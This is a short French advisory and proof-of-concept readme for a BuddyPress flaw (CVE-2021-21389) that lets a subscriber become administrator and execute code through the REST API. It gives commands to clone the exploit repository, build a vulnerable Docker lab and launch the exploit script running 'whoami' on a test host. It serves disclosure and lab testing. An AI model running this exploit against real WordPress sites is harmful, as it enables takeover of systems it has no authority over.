
BuddyPress est un plugin WordPress open source pour créer un site communautaire. Dans les versions de BuddyPress de 5.0.0 avant 7.2.1, il est possible pour un utilisateur non privilégié et régulier d'obtenir des droits d'administrateur en exploitant un problème dans le point de terminaison des membres de l'API REST. La vulnérabilité a été corrigée dans BuddyPress 7.2.1. Les installations existantes du plugin doivent être mises à jour vers cette version pour atténuer le problème.
BuddyPress < 7.2.1 - Escalade de privilèges via l'API REST pour exécution de code (RCE)
PoC (Complet)
Version affectée : de 5.0.0 à 7.2.0
Utilisateur requis : utilisateur Abonné
Méthode : Escalade de privilèges jusqu'à Administrateur et exécution de code (RCE) via l'API REST
Point de terminaison : /v1/members/me
git clone https://github.com/HoangKien1020/CVE-2021-21389
cd CVE-2021-21389/
docker build . -t hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Autre façon de récupérer ce docker au lieu de le construire :
docker pull hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Accédez à votre hôte/IP
Ex : http://test.local:8080
python3 CVE-2021-21389.py http://test.local:8080 test 1234 whoami
Exemple :

https://buddypress.org/2021/03/buddypress-7-2-1-security-release/